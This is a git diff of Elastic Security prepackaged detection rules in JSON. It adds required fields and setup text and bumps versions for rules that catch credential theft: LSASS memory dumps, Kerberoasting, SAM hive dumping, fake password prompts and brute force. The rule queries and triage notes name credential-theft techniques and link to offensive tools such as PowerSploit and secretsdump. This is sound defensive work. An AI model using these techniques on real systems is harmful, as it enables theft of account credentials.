true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "42bf698b-4738-445b-8231-c834ddefd8a0", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -54,5 +78,5 @@ "value": 25 }, "type": "threshold", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_persistence_network_logon_provider_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_persistence_network_logon_provider_modification.json index 110b790de887d..23fdfa5d7b8f0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_persistence_network_logon_provider_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_persistence_network_logon_provider_modification.json @@ -18,6 +18,23 @@ "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", "https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify" ], + "required_fields": [ + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "54c3d186-0461-4dc3-9b33-2dc5c7473936", "severity": "medium", @@ -63,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_posh_minidump.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_posh_minidump.json index 3330846bfc6c5..82c6e31ec1f1c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_posh_minidump.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_posh_minidump.json @@ -14,15 +14,28 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell MiniDump Script", - "note": "## Triage and analysis\n\n### Investigating PowerShell MiniDump Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse Process Memory Dump capabilities to extract credentials from LSASS or to obtain other\nprivileged information stored in the process memory.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check if the imported function was executed and which process it targeted.\n\n### False positive analysis\n\n- Regular users do not have a business justification for using scripting utilities to dump process memory, making false\npositives unlikely.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell MiniDump Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse Process Memory Dump capabilities to extract credentials from LSASS or to obtain other\nprivileged information stored in the process memory.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check if the imported function was executed and which process it targeted.\n\n### False positive analysis\n\n- Regular users do not have a business justification for using scripting utilities to dump process memory, making false\npositives unlikely.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.category:process and powershell.file.script_block_text:(MiniDumpWriteDump or MiniDumpWithFullMemory or pmuDetirWpmuDiniM)\n", "references": [ "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1", "https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-ProcessMiniDump.ps1", "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "577ec21e-56fe-4065-91d8-45eb8224fe77", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "high", "tags": [ "Elastic", @@ -79,5 +92,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_posh_request_ticket.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_posh_request_ticket.json index e0171ca436aef..7eede3ada2193 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_posh_request_ticket.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_posh_request_ticket.json @@ -11,14 +11,27 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Kerberos Ticket Request", - "note": "## Triage and analysis\n\n### Investigating Explicit PowerShell Kerberos Ticket Request\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making\nit available for use in various environments, creating an attractive way for attackers to execute code.\n\nAccounts associated with a service principal name (SPN) are viable targets for Kerberoasting attacks, which use brute\nforce to crack the user password, which is used to encrypt a Kerberos TGS ticket.\n\nAttackers can use PowerShell to request these Kerberos tickets, with the intent of extracting them from memory to\nperform Kerberoasting.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate if the script was executed, and if so, which account was targeted.\n- Validate if the account has an SPN associated with it.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Check if the script has any other functionality that can be potentially malicious.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Review event ID [4769](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4769)\nrelated to this account and service name for additional information.\n\n### False positive analysis\n\n- A possible false positive can be identified if the script content is not malicious/harmful or does not request\nKerberos tickets for user accounts, as computer accounts are not vulnerable to Kerberoasting due to complex password\nrequirements and policy.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services. Prioritize privileged accounts.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n powershell.file.script_block_text : (\n KerberosRequestorSecurityToken\n )\n", + "note": "## Triage and analysis\n\n### Investigating Explicit PowerShell Kerberos Ticket Request\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making\nit available for use in various environments, creating an attractive way for attackers to execute code.\n\nAccounts associated with a service principal name (SPN) are viable targets for Kerberoasting attacks, which use brute\nforce to crack the user password, which is used to encrypt a Kerberos TGS ticket.\n\nAttackers can use PowerShell to request these Kerberos tickets, with the intent of extracting them from memory to\nperform Kerberoasting.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate if the script was executed, and if so, which account was targeted.\n- Validate if the account has an SPN associated with it.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Check if the script has any other functionality that can be potentially malicious.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Review event ID [4769](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4769)\nrelated to this account and service name for additional information.\n\n### False positive analysis\n\n- A possible false positive can be identified if the script content is not malicious/harmful or does not request\nKerberos tickets for user accounts, as computer accounts are not vulnerable to Kerberoasting due to complex password\nrequirements and policy.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services. Prioritize privileged accounts.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n powershell.file.script_block_text : (\n KerberosRequestorSecurityToken\n )\n", "references": [ "https://cobalt.io/blog/kerberoast-attack-techniques", "https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "eb610e70-f9e6-4949-82b9-f1c5bcd37c39", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -80,5 +93,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_potential_lsa_memdump_via_mirrordump.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_potential_lsa_memdump_via_mirrordump.json index d6fd9ba869b29..4278104e8d650 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_potential_lsa_memdump_via_mirrordump.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_potential_lsa_memdump_via_mirrordump.json @@ -11,13 +11,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via DuplicateHandle in LSASS", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.code == \"10\" and \n\n /* LSASS requesting DuplicateHandle access right to another process */\n process.name : \"lsass.exe\" and winlog.event_data.GrantedAccess == \"0x40\" and\n\n /* call is coming from an unknown executable region */\n winlog.event_data.CallTrace : \"*UNKNOWN*\"\n", + "note": "", + "query": "process where event.code == \"10\" and\n\n /* LSASS requesting DuplicateHandle access right to another process */\n process.name : \"lsass.exe\" and winlog.event_data.GrantedAccess == \"0x40\" and\n\n /* call is coming from an unknown executable region */\n winlog.event_data.CallTrace : \"*UNKNOWN*\"\n", "references": [ "https://github.com/CCob/MirrorDump" ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.GrantedAccess", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "02a4576a-7480-4284-9327-548a806b5e48", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -52,5 +75,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_potential_ssh_bruteforce.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_potential_ssh_bruteforce.json index 4f945e22abdb3..a3aea71fa5fe7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_potential_ssh_bruteforce.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_potential_ssh_bruteforce.json @@ -15,6 +15,28 @@ "references": [ "https://themittenmac.com/detecting-ssh-activity-via-process-monitoring/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ace1e989-a541-44df-93a8-a8b0591b63c0", "severity": "medium", @@ -49,5 +71,5 @@ "value": 20 }, "type": "threshold", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_promt_for_pwd_via_osascript.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_promt_for_pwd_via_osascript.json index 31b08204b6e8e..0931671c036ed 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_promt_for_pwd_via_osascript.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_promt_for_pwd_via_osascript.json @@ -11,14 +11,32 @@ "language": "eql", "license": "Elastic License v2", "name": "Prompt for Credentials with OSASCRIPT", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and process.name : \"osascript\" and\n process.command_line : \"osascript*display dialog*password*\"\n", "references": [ "https://github.com/EmpireProject/EmPyre/blob/master/lib/modules/collection/osx/prompt.py", "https://ss64.com/osx/osascript.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "38948d29-3d5d-42e3-8aec-be832aaaf8eb", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -53,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_relay_ntlm_auth_via_http_spoolss.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_relay_ntlm_auth_via_http_spoolss.json index 47a585adb9af3..dc6d8ede0cc46 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_relay_ntlm_auth_via_http_spoolss.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_relay_ntlm_auth_via_http_spoolss.json @@ -18,6 +18,23 @@ "https://github.com/topotam/PetitPotam", "https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "4682fd2c-cfae-47ed-a543-9bed37657aa6", "severity": "high", @@ -46,5 +63,5 @@ } ], "type": "eql", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_remote_sam_secretsdump.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_remote_sam_secretsdump.json index f7876ff80e688..469b8f4e0a45a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_remote_sam_secretsdump.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_remote_sam_secretsdump.json @@ -12,13 +12,76 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Remote Credential Access via Registry", - "note": "## Triage and analysis\n\n### Investigating Potential Remote Credential Access via Registry\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, \nsuch as the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain\ncached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to\ndecrypt these secrets.\n\nAttackers can use tools like secretsdump.py or CrackMapExec to dump the registry hives remotely, and use dumped\ncredentials to access other systems in the domain.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as their role, criticality, and associated users.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Determine the privileges of the compromised accounts.\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target\nhost.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious\nmust be monitored by the security team.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine if other hosts were compromised.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Ensure that the machine has the latest security updates and is not running unsupported Windows versions.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThis rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be\ncollected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "sequence by host.id, user.id with maxspan=1m\n [authentication where\n event.outcome == \"success\" and\n winlog.logon.type == \"Network\" and not user.name == \"ANONYMOUS LOGON\" and\n not user.domain == \"NT AUTHORITY\" and source.ip != \"127.0.0.1\" and source.ip !=\"::1\"]\n [file where event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : \"S-1-5-21-*\" and file.size >= 30000]\n", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Credential Access via Registry\n\nDumping registry hives is a common way to access credential information. Some hives store credential material,\nsuch as the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain\ncached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to\ndecrypt these secrets.\n\nAttackers can use tools like secretsdump.py or CrackMapExec to dump the registry hives remotely, and use dumped\ncredentials to access other systems in the domain.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as their role, criticality, and associated users.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Determine the privileges of the compromised accounts.\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target\nhost.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious\nmust be monitored by the security team.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine if other hosts were compromised.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Ensure that the machine has the latest security updates and is not running unsupported Windows versions.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "sequence by host.id, user.id with maxspan=1m\n [authentication where\n event.outcome == \"success\" and event.action == \"logged-in\" and\n winlog.logon.type == \"Network\" and not user.name == \"ANONYMOUS LOGON\" and\n not user.domain == \"NT AUTHORITY\" and source.ip != \"127.0.0.1\" and source.ip !=\"::1\"]\n [file where event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : \"S-1-5-21-*\" and file.size >= 30000 and\n not file.path :\n (\"?:\\\\Windows\\\\system32\\\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_*.registry\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat\",\n \"?:\\\\Users\\\\*\\\\ntuser.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\NTUSER.DAT\")]\n", "references": [ "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.size", + "type": "long" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "850d901a-2a3c-46c6-8b22-55398a01aad8", + "setup": "This rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be\ncollected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -68,5 +131,5 @@ } ], "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_root_console_failure_brute_force.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_root_console_failure_brute_force.json index b20ef22a9d152..434ae68781a0b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_root_console_failure_brute_force.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_root_console_failure_brute_force.json @@ -14,13 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Management Console Brute Force of Root User Identity", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:signin.amazonaws.com and event.action:ConsoleLogin and aws.cloudtrail.user_identity.type:Root and event.outcome:failure\n", "references": [ "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "4d50a94f-2844-43fa-8395-6afbd5e1c5ef", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -54,5 +89,5 @@ "value": 10 }, "type": "threshold", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_saved_creds_vaultcmd.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_saved_creds_vaultcmd.json index d7b15ae14924e..6fbe8e75c04cf 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_saved_creds_vaultcmd.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_saved_creds_vaultcmd.json @@ -12,14 +12,37 @@ "language": "eql", "license": "Elastic License v2", "name": "Searching for Saved Credentials via VaultCmd", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") 